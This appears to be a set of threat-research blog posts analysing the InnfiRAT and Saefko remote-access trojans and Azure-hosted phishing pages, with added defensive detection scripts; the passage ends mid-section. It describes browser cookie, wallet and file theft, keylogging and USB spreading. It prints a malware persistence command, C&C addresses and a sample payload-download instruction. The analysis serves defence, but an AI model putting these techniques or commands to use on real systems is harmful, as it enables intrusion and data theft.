After performing the VM checks, the malware obtains the country and HWID information of the machine it is running on. To obtain the country information, it calls the routine EjarVhXфf8752612307563884480() [FetchNetworkInfo] and fetches the Country key value from the returned data in JSON format. Similarly, to obtain the HWID, it calls the routine ubобмдGogBлzWKrgrыaZucвлC33208440168().
Anti-VM checks
Inside the JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337() [VMDetection] routine:
Note: All the enum values are referenced using enum[index] during analysis where the index starts from 0.
1. Performs WMIquery to obtain the following information:
"Manufacturer", "Caption", "Name", "ProcessorId", "NumberOfCores", "NumberOfLogicalProcessors", "L2CacheSize", "L3CacheSize", "SocketDesignation"
It then checks, one-by-one, if the manufacturer contains one of the below-mentioned strings and returns the value from the enum as specified:
“VBoxVBoxVBox” returns enum[2]
“VMwareVMware” returns enum[1]
“Prl hyperv” returns enum[3]
“Microsoft Corporation” returns enum[4]
2. WMIquery is performed again but this time to obtain the following information:
"DeviceID", "MediaType", "Model", "PNPDeviceID", "SerialNumber"
A check is performed if the PnpDeviceId contains one of the below strings and returns the value from the enum as specified:
“VBOX_HARDDISK” returns enum[2]
“VEN_VMWARE” returns enum[1]
If none of the above conditions match, it returns enum[0].
Machine network information
Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine:
A web request is sent to the following URL https://ipinfo[.]io/json and the received data is returned from the function. The received data contains the following information:
"ip", "city", "region", "country", "loc", "postal", "org"
Figure 7: Web request being made
Network communication
Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine:
InnfiRAT sets up a duplex channel named “IVictim” using DuplexChannelFactory, pointed at tcp://62[.]210[.]142[.]219:17231/IVictim
Figure 8: Creating a duplex channel with C&C server
After forming the duplex channel with the name IVictim, it uses the IVictim interface, which contains the following methods:
“Subscribe”, “CompleteTask”, “GetDlls”, “AvailableTasks”
Figure 9: Available methods in the IVictim interface
Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine:
InnfiRAT calls the Subscribe method of the IVictim interface with login = “innfiniti”
Figure 10: The subscribe method from the IVictim interface is invoked
Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine:
InnfiRAT obtains the tasks inside a UserTask list by invoking AvailableTasks where UserTask has the following keys:
“ID”, “Action”, “URL”, “FinalPoint”, “Current”, “Status”, “Country”, “RunSilent”, “Argument”
It iterates through each task. On each iteration, it checks that the task's Country value is either “ALL” or equal to the country stored earlier in the BasicInfoVictim class, that the Action to perform is "DownAndEx", and that a URL value is available. If all of these conditions hold, the CompleteTask method is called with three arguments:
“login”, “hwid”, “TaskID”
The RAT then calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file:
Arg1 = Path of the file to be executed [obtained from the URL]
Arg2 = Arguments to the file to be executed [obtained from the Argument key of the current UserTask element]
Arg3 = true/false [obtained from the RunSilent key of the current UserTask element]
After iterating all items in the UserTask list, it sleeps for 30,000 milliseconds.
Figure 11: Country, action, and URL checks are performed and the specified task is completed
Process checks
Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine:
All the running processes in the system are obtained, their names are converted to lowercase and then a check is performed to see if the name matches with any of the following strings:
“taskmgr”, “processhacker”, “procmon”, “procexp”, “pchunter”, “procexp64”
If there are any matches, the process terminates. Below are the snapshots depicting the actions performed.
Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes
Figure 13: Converting ProcessName to lowercase
Figure 14: Checking for above-mentioned running processes (process names are obfuscated here)
Inside wYxйыrоyTHuLдTч212065() [KillProcesses] routine:
InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings:
“chrome”, “browser”, “firefox”, “opera”, “amigo”, “kometa”, “torch”, “orbitum”
Figure 15: Kills processes that contain any of the above-mentioned strings
Scheduled execution
Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine:
The CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like below:
/C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm /du 9999:59 /sc daily /ri 1 /f
Figure 16: CMD command is constructed and executed
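As an added example (not code from the Zscaler post), the following Python parses process-creation command lines of the shape shown above and flags the traits that make this persistence command stand out: an action under %AppData%, a one-minute repetition interval held for thousands of hours, a forced overwrite, and a Windows-sounding task name outside the \Microsoft\Windows\ folder. The sample command lines, including the start time, are constructed.

```python
import re

# Constructed process-creation command lines (not from the original post), in the
# shape an EDR or Sysmon "process create" event carries.
SAMPLE_CMDLINES = [
    # the persistence command InnfiRAT builds (start time HH:mm filled in with a made-up value)
    'cmd.exe /C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " '
    '/st 10:15 /du 9999:59 /sc daily /ri 1 /f',
    # a constructed benign vendor updater task for comparison
    'schtasks /create /tn "Adobe Acrobat Update Task" '
    '/tr "C:\\Program Files\\Adobe\\AdobeARM.exe" /sc daily /st 12:00',
    # not a task creation at all
    'schtasks /query /tn WindowsUpdater',
]

# Path markers for locations an unprivileged user can write to.
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%", "%tmp%", "\\users\\")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs together
    and dropping the surrounding quotes (backslashes are left untouched)."""
    raw = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] == '"' else t for t in raw]


def parse_schtasks_create(cmdline):
    """Return {option: value} for a 'schtasks /create' invocation, or None if the
    command line is not one. Options without a value (e.g. /f) map to True."""
    tokens = tokenize(cmdline)
    start = next((i for i, t in enumerate(tokens)
                  if t.lower() in ("schtasks", "schtasks.exe")), None)
    if start is None:
        return None
    opts, i = {}, start + 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[tok.lower()] = tokens[i + 1]
                i += 1
            else:
                opts[tok.lower()] = True
        i += 1
    return opts if "/create" in opts else None


def duration_hours(value):
    """Convert a '/du HHHH:MM' value to hours; anything unparsable counts as 0."""
    m = re.fullmatch(r"(\d+):(\d{2})", str(value or ""))
    return int(m.group(1)) + int(m.group(2)) / 60 if m else 0.0


def assess_task(opts):
    """Heuristics for one task creation; returns the reasons it looks suspicious."""
    reasons = []
    run = str(opts.get("/tr", "")).lower()
    name = str(opts.get("/tn", "")).lower()
    if any(marker in run for marker in USER_WRITABLE):
        reasons.append("action runs from a user-writable location")
    # "/sc daily /ri 1 /du 9999:59" means re-run every minute, practically forever
    interval, hours = opts.get("/ri"), duration_hours(opts.get("/du"))
    if isinstance(interval, str) and interval.isdigit() and int(interval) <= 5 and hours >= 24:
        reasons.append("repeats every %s min for %.0f h" % (interval, hours))
    if opts.get("/f") is True:
        reasons.append("/f silently replaces any existing task of that name")
    if "windows" in name and not name.startswith("\\microsoft\\windows\\"):
        reasons.append("task name mimics Windows but is outside \\Microsoft\\Windows\\")
    return reasons


def scan(cmdlines):
    """Map each command line to its reasons: [] for a benign create, None if not a create."""
    results = {}
    for cmdline in cmdlines:
        opts = parse_schtasks_create(cmdline)
        results[cmdline] = None if opts is None else assess_task(opts)
    return results


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_CMDLINES).items():
        print(cmdline, "->", reasons)
```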
C&C commands
Here are some tasks performed by the malware based on the commands received from C&C server:
1. SendUrlAndExecute(string URL)
InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory is first created with the name TEMP inside the %AppData% if it doesn’t exist. Then the file is downloaded and saved inside this folder with the name extracted from the passed URL. The URL passed is broken into parts via delimiter ‘/’ and the last item is used as the file name.
Figure 17: Create folder and download file
Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file:
Arg1 = Path of the file to be executed
Arg2 = Arguments to the file to be executed
Arg3 = true
Figure 18: Execute the downloaded file
2. ProfileInfo()
Inside the routine, it collects the following information:
NetworkInfo: ip, city, region, country, loc, postal, org
PCAdmin
PCInformation: FrameWorkDescription, Processors, PRocessorsCore, VideoCards
It then sends the information to the C&C server.
Figure 19: UserProfile info being collected and sent to the C&C server
3. LoadLogs()
It calls the GetDlls() routine, which returns a list of type DownloadDll, where DownloadDll has two keys:
Path: a relative path to an .exe file
ByteArray: binary data
Figure 20: GetDlls being called
After fetching the list, InnfiRAT traverses each element inside the list via a for-loop. Inside the for-loop:
The value of the Path key is split using the delimiter “\\”; the second value in the split is the name of the directory. A check is performed to see whether the split yields more than two parts and no directory with the obtained name exists inside the executing module's directory. If the check is true, a directory with the obtained name is created.
A check is performed to see whether the file specified by the Path key exists in the executing module's directory. If it does not, the file is created and the value of ByteArray is written to it.
The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called.
Finally, data obtained from UserProfile() is sent to the C&C server.
Figure 21: A directory is created, file is created, and KillProcesses is called; response is sent to the C&C server
4. LoadCookies() - Steal Browser Cookie information
InnfiRAT calls the GetDlls() routine, which returns a list of type DownloadDll, where DownloadDll has two keys:
Path: a relative path to an .exe file
ByteArray: binary data
Figure 22: GetDlls being called
After fetching the list, the malware traverses each element inside the list via for-loop. The following occurs inside the for-loop:
The value of the Path key is split using the delimiter “\\”; the second value in the split is the name of the directory. A check is performed to see whether the split yields more than two parts and no directory with the obtained name exists inside the executing module's directory. If the check is true, a directory with the obtained name is created.
A check is performed to see whether the file specified by the Path key exists in the executing module's directory. If it does not, the file is created and the value of ByteArray is written to it.
Figure 23: Directory is created, file is created
It creates an empty list of BrowserCook type, where BrowserCook has two keys, namely “CookiePaths” and “BrowserName”.
The name and corresponding cookie path are retrieved for the following browsers one by one:
“Chrome”, “Yandex”, “Kometa”, “Amigo”, “Torch”, “Orbitum”, “Opera”, “Mozilla”
A BrowserCook type element is created with the fetched information and is added to the list created earlier.
Figure 24: Browser info is retrieved and added to the list
It creates an empty list of BrowserCookie type, where BrowserCookie has three keys, namely “Browser”, “FileName” and “FileArray”.
Inside two for-loops, elements of the BrowserCookie type are created: the Browser key and FileArray key are assigned values using the information from the previously created BrowserCook list, and FileName is set to _Cookie.txt if the browser name of the current element is not “Mozilla”, or to Cookie.txt otherwise.
Figure 25: BrowserCookie elements list is built
The harvested BrowserCookie list is then sent to the C&C server and the temporary file and directory are deleted.
Figure 26: File and directory is deleted
5. LoadWallets() - Steal Bitcoin Wallets
The malware creates an empty list of the BitcoinWallet type, where BitcoinWallet has two keys, namely “WalletArray” and “WalletName”.
A check is performed to see if a file for a Litecoin or Bitcoin wallet is present in the system at the following location:
Litecoin: %AppData%\Litecoin\wallet.dat
Bitcoin: %AppData%\Bitcoin\wallet.dat
If it is found, then the element of type BitcoinWallet is added to the list after assigning a name to the WalletName key and reading the corresponding wallet file in the WalletArray key.
Figure 27: File presence is checked, BitcoinWallet element is added to the list
Finally, the created list is sent in response to the C&C server.
Figure 28: List is sent in response to the C&C server
6. LoadFiles() - Steal small text files potentially containing sensitive information
InnfiRAT collects all the .txt files on the desktop whose size is less than 2,097,152 bytes into a list of type CustomFile. CustomFile has two keys, namely “Name” and “FileArray”.
The created list is sent in response to the C&C server.
Figure 29: Files are collected and sent to the C&C server
Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]
7. LoadProcesses() - Get the list of running processes on the victim machine
InnfiRAT creates an empty list of type ProcessInfo, where ProcessInfo has three keys, namely “ID”, “Name” and “Path”.
It obtains the list of all the processes running in the system and sends the list in response to the C&C server.
Figure 31: Process information is obtained and the list is sent to the C&C server
8. Kill(int process) - Command to Kill a specific process on the victim machine
InnfiRAT obtains the list of all the processes running in the system and then inside a for-loop, the processID of obtained processes is compared with the processID passed as an argument to this routine one at a time. If there is a match, the process is killed and the flag variable is set to true.
Finally, a response is sent to C&C server.
Figure 32: Process is killed and response is sent
9. Screenshot() - Take a screenshot on the victim machine
It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.
Figure 33: Screenshot captured and sent to the C&C server
Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine
10. RunCommand(string command) - Execute specified command on the victim machine
This creates a new CMD process, builds the command line argument using the command passed as an argument to this routine, and finally starts the process.
Command line argument: /c + “ ” + command
Figure 35: Received command is executed
11. ClearCooks() - Clears browser Cookies on the victim machine for specific Browsers
InnfiRAT creates an empty list of BrowserCook type, where BrowserCook has two keys, namely “CookiePaths” and “BrowserName”.
The name and corresponding cookie path are retrieved for the following browsers one by one:
“Chrome”, “Yandex”, “Kometa”, “Amigo”, “Torch”, “Orbitum”, “Opera”, “Mozilla”
A BrowserCook type element is created with the fetched information and is added to the list created earlier.
Figure 36: Browser info is retrieved and added to the list
The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called.
The BrowserCook type list created earlier is traversed and cookies files are deleted using CookiePaths key value.
Finally, a response is sent to the C&C server.
Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and response is sent to the C&C server
Conclusion
A RAT (remote-access trojan) is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and enabling them to perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. RATs can also be designed to spread to other systems on a network.
Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source.
The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.
IOCs
Md5: f992dd6dbe1e065dff73a20e3d7b1eef
Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip
NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim
Saefko: A new multi-layered RAT
Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, and data stealing and spreading module.
Background
A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more.
Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It fetches the Chrome browser history looking for specific types of activity, such as visits involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C instructs the malware to provide system information, and the RAT begins to collect a range of data including screenshots, videos, keystroke logs and more. The C&C can also instruct the malware to download an additional payload onto the infected system.
RATs present a unique business threat. They have the ability to steal a lot of data without being detected and spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.
Technical Analysis of the Saefko RAT
Saefko malware unpacks itself and places the saefkoagent.exe file in “/%AppData%/Roaming/SaefkoAgent.exe” and executes it. It also copies itself to “/%AppData%/Roaming/windows.exe” and "/%AppData%/Local/explorer.exe” and executes them.
Autostart Key
The Saefko malware creates a startup key to execute the malware at every login. If it is executing from an admin account, it creates the following registry key:
“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer”
Otherwise, it creates a registry key in the following path:
“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer”
Functionality
Saefko first checks to see whether the internet connection is active by connecting to “clients3.google.com/generate_204”. It then uses a unique technique to identify if the infected system contains any vital information. It fetches the browser history and searches for particular websites that have been visited by the user and makes a count based on the categories mentioned below. From the counts, the attacker can determine which systems it should target first from all the infected systems.
The categories it searches for, each followed by the sites it counts, include:
Credit card possibility
Gaming activity value
Cryptocurrency value
Instagram activity
instagram.com
m.instagram.com
Facebook activity
facebook.com
m.facebook.com
Youtube activity
youtube.com
m.youtube.com
Google+ activity
plus.google.com
m.plus.google.com
Gmail activity
gmail.com
mail.google.com
Shopping activity
Business value
Saefko also collects additional user application data, including:
Command: Description
irc_channel: IRC channel name
irc_nickname: Nickname
irc_password: IRC channel password
irc_port: IRC port for communication with a server
irc_server: Server name
machine_active_time: System uptime
machine_artct: Machine architecture
machine_bitcoin_value: Number of cryptocurrency sites visited by the user
machine_business_value: Number of business sites visited by the user
machine_calls_activity: 0
machine_camera_activity: Number of “.png” files present on the desktop
machine_country_iso_code: Country code fetched from “ipinfo.io/geo”
machine_lat: The geographic location of the system (latitude)
machine_lng: The geographic location of the system (longitude)
machine_creadit_card_posiblty: Number of payment sites visited by the user
machine_current_time: Current machine time
machine_facebook_activity: Number of times the user visited Facebook
machine_gaming_value: Number of times the user visited gaming websites
machine_gmail_avtivity: Number of times the user visited Gmail
machine_googleplus_activity: Number of times the user visited Google+
machine_instgram_activty: Number of times the user visited Instagram
machine_ip: Machine IP
machine_os_type: 1
machine_screenshot: Captures a screenshot and encodes it in Base64
machine_shooping_activity: Number of times shopping sites were visited by the user
The RAT sends the collected data to a command and control server as shown below:
After getting an "ok" response from the server, Saefko begins the "StartServices" function, which has four different infection modules:
HTTPClinet
IRCHelper
KEYLogger
StartLocalServices (USB spreading)
HTTP Clinet
(Possible misspelling of HTTP Client by the author)
The RAT sends a request to the server asking for a new task. It sends the command “UpdateAndGetTask” along with other information, including machine_ID, machine_os, and privateip, as shown below:
The task is a URL from which the malware downloads a new payload and executes it on the infected machine.
Key Logger
The malware uses the SetWindowsHookEx API to capture keystrokes. It stores the captured keystrokes in a “log.txt” file at the path “\%AppData%\Local\log.txt”.
IRC Helper
First, the malware disconnects the current IRC connection. Then, it sends status information to the C&C as shown below:
pass: password
command: UpdateHTTPIRCStatus
machine_id: unique id sent by C&C in an earlier request
irc_status: 1
Next, the malware fetches:
Server list: it selects a server from its hardcoded list of public IRC servers.
Port: the port paired with the selected server.
Nickname: it generates a random 7-character name.
Saefko connects to one of these servers and waits for a response. In the response, it checks for the “T_T” string and splits the message into separate parts on that string. Below is the list of IRC functions that the RAT can perform. According to the command it receives, Saefko responds with the corresponding data.
List of IRC Commands
IRC Command: Description
dexe: Download a file from a given URL and execute it
hdexe: Download a file from a given URL and execute it (UseShellExecute = false)
vistpage: Open a URL
hvistpage: Open a URL (UseShellExecute = false)
snapshot: Capture a video frame, convert it to Base64 and send it to the C&C (detailed below); also replies “.oksnapshot”
shell: Execute a command using cmd.exe
tcp: Make a TCP connection to a given IP and port
identify: Send system information: OS type (Microsoft Windows), OS version, OS username, OS machine name, OS system directory
opencd: Open the CD-ROM drive (command: set CDAudio door open)
closecd: Close the CD-ROM drive (command: set CDAudio door closed)
screenshot: Capture a screenshot, encode it in Base64 and send it to the C&C
ping: Reply “okping”
camlist: Get the video devices on the system and send the information to the C&C (detailed below)
pwd: Current directory
location: Get the system location using “https://ipinfo.io/geo” (IP, city, region, country, latitude and longitude)
keylogs: Encode the keylog file (log.txt) in Base64 and send it to the C&C
uninstall: Delete the autostart registry key (Run) and terminate itself
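The post says Saefko splits C&C messages on “T_T” and lists the command names above, which is enough to write a passive detector for the traffic. The following Python is an added example (not code from the post): it parses IRC PRIVMSG lines, splits the text on the delimiter and classifies commands, bot replies and unknown delimited messages. The IRC lines are constructed, and the command-then-arguments layout around “T_T” is an assumption.

```python
import re

# Command names taken from the post's IRC command table.
SAEFKO_COMMANDS = {
    "dexe", "hdexe", "vistpage", "hvistpage", "snapshot", "shell", "tcp",
    "identify", "opencd", "closecd", "screenshot", "ping", "camlist", "pwd",
    "location", "keylogs", "uninstall",
}
# Replies the post says the bot sends back.
BOT_REPLIES = {"okping", ".oksnapshot"}
DELIM = "T_T"

# Constructed IRC traffic (not captured from the campaign). Assumption: the
# operator sends "<command>T_T<argument>" as the message text.
SAMPLE_LINES = [
    ":op!u@h PRIVMSG #chan :dexeT_Thttp://files.example.invalid/payload.exe",
    ":op!u@h PRIVMSG #chan :shellT_Twhoami",
    ":op!u@h PRIVMSG #chan :ping",
    ":bot!u@h PRIVMSG #chan :okping",
    ":alice!u@h PRIVMSG #chan :anyone tried the new release?",
    ":op!u@h PRIVMSG #chan :reloadT_Tconfig",
    "PING :irc.example.invalid",
]

IRC_RE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<verb>\S+)(?: (?P<params>.*))?$")


def parse_irc(line):
    """Minimal IRC line parser: returns (sender nick, VERB, trailing text).
    The trailing text is the parameter introduced by ' :' (or a leading ':')."""
    m = IRC_RE.match(line.rstrip("\r\n"))
    if not m:
        return None, None, None
    nick = (m.group("prefix") or "").split("!", 1)[0]
    params = m.group("params") or ""
    if " :" in params:
        trailing = params.split(" :", 1)[1]
    elif params.startswith(":"):
        trailing = params[1:]
    else:
        trailing = None
    return nick, m.group("verb").upper(), trailing


def classify(line):
    """Describe a Saefko-style C&C message, or return None for ordinary IRC."""
    nick, verb, text = parse_irc(line)
    if verb != "PRIVMSG" or text is None:
        return None
    parts = text.split(DELIM)
    head = parts[0].strip().lower()
    if head in BOT_REPLIES:
        return {"kind": "reply", "nick": nick, "command": head}
    if head in SAEFKO_COMMANDS:
        # single-word commands such as "ping" also match ordinary chat, so
        # weight them lower than delimited ones when alerting
        return {"kind": "command", "nick": nick, "command": head, "args": parts[1:]}
    if len(parts) > 1:
        return {"kind": "unknown_delimited", "nick": nick, "command": head, "args": parts[1:]}
    return None


def scan(lines):
    """Collect the suspicious messages and the nicks that issued known commands."""
    hits = [h for h in (classify(l) for l in lines) if h]
    operators = sorted({h["nick"] for h in hits if h["kind"] == "command"})
    return hits, operators


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES)[0]:
        print(hit)
```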
Camlist
Saefko also searches the system for the following library files:
AForge.dll
AForge.Video.DirectShow.dll
AForge.Video.dll
Sqlite3.dll
If these files are not present, the malware sends a request to the C&C to download these files. Next, it searches for a list of video input devices on the targeted system and sends the related information to the C&C.
Snapshot
Saefko also captures video frames from a camera device present on the system, encodes each frame in Base64 and sends it to the C&C.
Start USB Service
Saefko checks to see if the drive type is either removable or networked, after which it starts the infection and copies the files below onto a removable drive.
Sas.exe
USBStart.exe
usbspread.vbs
Sas.exe is a copy of the malware itself. USBStart.exe is fetched from the resource section of the main binary and contains code to execute Sas.exe. The malware creates a usbspread.vbs file and then executes it. The script searches every directory and all the files and creates a .lnk file for each file and directory, with USBStart.exe as the target path. When the removable device is plugged into another system, the user is tricked into clicking a .lnk file, as the original files and folders are hidden. The .lnk file executes USBStart.exe, which ends up executing Sas.exe, the main payload. In this way the malware spreads to other systems.
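As an added example (not code from the post), the following Python shows how a scan of a freshly inserted removable drive could recognise the layout described above: the three dropper files, and visible .lnk files that shadow a hidden original of the same name and point at USBStart.exe. It includes a small MS-SHLLINK parser that reads the header flags and StringData; the shortcut bytes and directory listing are constructed, and the assumption that each shortcut passes the original name as an argument is an assumption, not something the post states.

```python
import struct

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader (offset 20).
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
DROPPER_FILES = {"sas.exe", "usbstart.exe", "usbspread.vbs"}  # names from the post


def build_lnk(rel_path, args=""):
    """Build a minimal shell link: header plus Unicode StringData, with no IDList or
    LinkInfo. Constructed test data only; the campaign's real .lnk layout is not
    known from the post."""
    flags = IS_UNICODE | HAS_REL_PATH | (HAS_ARGS if args else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(s):  # CountCharacters (uint16) followed by UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(rel_path) + (string_data(args) if args else b"")


def parse_lnk(data):
    """Parse the header and StringData of a .lnk, skipping the IDList and LinkInfo
    blocks by their own size fields. Returns the string fields that are present."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 0x4C
    if flags & HAS_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            if flags & IS_UNICODE:
                fields[key] = data[off:off + 2 * count].decode("utf-16-le")
                off += 2 * count
            else:
                fields[key] = data[off:off + count].decode("cp1252", "replace")
                off += count
    return fields


def lnk_runs_dropper(fields):
    """True when the shortcut's target or arguments reference one of the dropper files."""
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    return any(name in target for name in DROPPER_FILES)


def assess_removable_root(entries, lnk_blobs):
    """entries: [{name, hidden}] for the drive root; lnk_blobs: {lnk name: bytes}.
    Returns the findings a scan of a freshly inserted drive would report."""
    findings = []
    by_lower = {e["name"].lower(): e for e in entries}
    present = sorted(DROPPER_FILES & set(by_lower))
    if present:
        findings.append("dropper files present: " + ", ".join(present))
    for lnk_name, blob in lnk_blobs.items():
        stem = lnk_name[:-4] if lnk_name.lower().endswith(".lnk") else lnk_name
        original = by_lower.get(stem.lower())
        if original and original["hidden"] and lnk_runs_dropper(parse_lnk(blob)):
            findings.append("%s shadows hidden '%s' and launches a dropper file" % (lnk_name, stem))
    return findings


# Constructed listing of an infected drive root (not captured from the campaign).
SAMPLE_ENTRIES = [
    {"name": "USBStart.exe", "hidden": True}, {"name": "Sas.exe", "hidden": True},
    {"name": "usbspread.vbs", "hidden": True}, {"name": "Photos", "hidden": True},
    {"name": "Photos.lnk", "hidden": False}, {"name": "report.docx", "hidden": True},
    {"name": "report.docx.lnk", "hidden": False}, {"name": "README.txt", "hidden": False},
]
# Assumption: each shortcut runs USBStart.exe and passes the original name as its argument.
SAMPLE_LNKS = {
    "Photos.lnk": build_lnk(".\\USBStart.exe", "Photos"),
    "report.docx.lnk": build_lnk(".\\USBStart.exe", "report.docx"),
}

if __name__ == "__main__":
    for finding in assess_removable_root(SAMPLE_ENTRIES, SAMPLE_LNKS):
        print(finding)
```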
Below is the code of the usbspread.vbs file:
One online forum has an ad for a cracked Saefko RAT tool as shown below. It is a multi-protocol, multi-operating system remote administration tool that can be used to launch the malware on Windows and Android devices.
Conclusion
To protect systems from RATs, users must refrain from downloading programs or opening attachments that aren't from a trusted source. At the administrative level, it's always a good idea to block unused ports, turn off unused services, and monitor outgoing traffic. Attackers are often careful to prevent the malware from doing too much activity at once, which would slow down the system and possibly attract the attention of the user and IT.
Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.
IOCs
Md5: D9B0ECCCA3AF50E9309489848EB59924 C4825334DA8AA7EA9E81B6CE18F9C15F 952572F16A955745A50AAF703C30437C 4F2607FAEC3CB30DC8C476C7029F9046 7CCCB06681E7D62B2315761DBE3C81F9 5B516EAB606DC3CC35B0494643129058
Downloader URL: industry.aeconex[.]com/receipt-inv.zip 3.121.182[.]157/dwd/explorer.exe 3.121.182[.]157/dwd/vmp.exe deqwrqwer.kl[.]com.ua/ex/explorer.exe maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip
Network URL: acpananma[.]com/love/server.php 3.121.182[.]157/smth/server.php f0278951.xsph[.]ru/server.php maprivate[.]date/server.php
Abusing Microsoft’s Azure domains to host phishing attacks
Recently, the Zscaler ThreatLabZ team came across various phishing attacks leveraging Microsoft Azure custom domains. These sites are signed with a Microsoft SSL certificate, so they are unlikely to raise suspicion about their authenticity. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period.
In this blog, we will describe two of the prominent vectors used and we’ll show several examples of the phishing pages.
The following figure depicts the phishing hits that were hosted using the Azure domain (Windows.net) and blocked by the Zscaler cloud.
Fig 1: Phishing hits using the Azure domain web.core.windows.net (green) and blob.core.windows.net (orange)
The following is the Whois lookup information related to the Windows.net domain.
Fig 2: Whois lookup info for the Windows.net domain
For these phishing campaigns, the delivery vector was spam emails.
CASE 1:
In this case, the attacker sends a spam email to a user, appearing to come from a particular organization and notifying the user that seven emails have been quarantined. It states that in order to review the emails, the user has to log in using the work or school account.
Fig 3: Spam email with direct phishing link
If the user clicks the view emails button, it will redirect to the Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html).
Fig 4: Outlook login phishing page
Some users may get confused because of the unknown URL hosting the Outlook login page. To trick those users, the attackers have used the SSL certificate issued by Microsoft as shown below.
Fig 5: SSL certificate page of the hosted phishing URL
The following figure depicts the source code of the phishing page, which is used by attackers to collect users’ data.
Fig 6: Source code of the phishing URL page
Once the login information has been entered by the user, the form will post the user’s credential details to the compromised domain that is operated by the cybercriminals.
Fig 7: Captured data traffic that has been sent to the attacker’s site
CASE 2:
